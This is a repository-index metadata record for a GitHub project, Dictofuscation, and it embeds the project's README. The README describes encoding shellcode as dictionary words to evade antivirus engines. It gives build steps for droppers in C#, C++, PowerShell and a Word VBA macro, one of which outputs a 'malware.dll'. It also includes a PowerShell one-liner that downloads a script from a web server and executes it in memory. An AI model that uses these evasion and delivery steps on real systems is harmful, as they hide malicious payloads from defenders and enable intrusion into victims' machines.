{"id":13821826,"url":"https://github.com/ProcessusT/Dictofuscation","last_synced_at":"2025-05-16T15:30:58.180Z","repository":{"id":248007685,"uuid":"827293671","full_name":"ProcessusT/Dictofuscation","owner":"ProcessusT","description":"Obfuscate the bytes of your payload with an association dictionary","archived":false,"fork":false,"pushed_at":"2024-11-12T10:47:08.000Z","size":547,"stargazers_count":28,"open_issues_count":1,"forks_count":2,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-11-12T11:34:53.565Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ProcessusT.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-07-11T11:17:40.000Z","updated_at":"2024-11-12T10:47:12.000Z","dependencies_parsed_at":"2024-08-19T08:57:37.415Z","dependency_job_id":"592b34d7-e781-43e5-8cf7-f764dfe968d9","html_url":"https://github.com/ProcessusT/Dictofuscation","commit_stats":null,"previous_names":["processust/dictofuscation"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProcessusT%2FDictofuscation","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProcessusT%2FDictofuscation/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProcessusT%2FDictofuscation/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProcessusT%2FDictofuscation/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ProcessusT","download_url":"https://codeload.github.com/ProcessusT/Dictofuscation/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225436299,"owners_count":17474116,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T08:01:29.747Z","updated_at":"2025-05-16T15:30:58.157Z","avatar_url":"https://github.com/ProcessusT.png","language":"Python","readme":"# Dictofuscation\n\n\n# Code obfuscation with association dictionnary\n\nThe use of a shellcode encoder by dictionary association is in the same logic as obfuscation by IP address, by Mac address or UUID, but includes linguistic consistency. This project merges security and linguistic engineering for advanced concealment.\n\n\n## Why strings\n\nSome antiviruses may consider that the presence of English strings in the compiled data of a binary are considered as a historical indicator and reinforce its legitimacy against detection engines.\nDictionary association does not increase entropy and allows complex data encoding to be reversed.\n\n\n## Execution\n\nBy default, the encoder takes a list of words from MIT, but you can also create your own.\nIt calculates each hexadecimal value from 0x00 to 0xFF and associates a word with it. Then, each byte of your shellcode is converted to hexadecimal and encoded with the corresponding word.\nYou can do the exact opposite in C# to get your shellcode.\n\n\u003cbr\u003e\n\u003cimg src=\"https://github.com/ProcessusT/Dictofuscation/raw/main/.assets/demo.png\" width=\"100%;\"\u003e\u003cbr\u003e\n\n\n## COMPILATION\n\u003cbr /\u003e\n\n# For C# :\n    \u003e Generate your RAW shellcode file\n    \u003e Use the encoder to obfuscate it : python.exe .\\encode_cs.py .\\payload.bin\n    \u003e Compile your C# dropper : csc.exe /target:library /platform:x64 /out:.\\malware.dll .\\generated_code.cs\n\n# For C++ :\n    \u003e Generate your RAW shellcode file\n    \u003e Use the encoder to obfuscate it : python.exe .\\encode_cpp.py .\\payload.bin\n    \u003e Create a new C++ Console project in Visual Studio\n    \u003e Copy and paste the generated_code.cs content and build your project\n\n# For Powershell :\n    \u003e Generate your RAW shellcode file\n    \u003e Use the encoder to obfuscate it : python.exe .\\encode_psh.py .\\payload.bin\n    \u003e Put your generated_code.ps1 into a web server folder\n    \u003e Open a Powershell windows on the client side and make an in-memory execution :\n        iwr http://yourwebserveripaddress/generated_code.ps1 | IEX\n\n# For VBA :\n    \u003e Generate your RAW shellcode file\n    \u003e Use the encoder to obfuscate it : python.exe .\\encode_vba.py .\\payload.bin\n    \u003e Open word, create a new macro and paste the generated_macro.vba content in it\n\n\u003cbr /\u003e\u003cbr /\u003e\u003cbr /\u003e\n","funding_links":[],"categories":["Python"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FProcessusT%2FDictofuscation","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FProcessusT%2FDictofuscation","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FProcessusT%2FDictofuscation/lists"}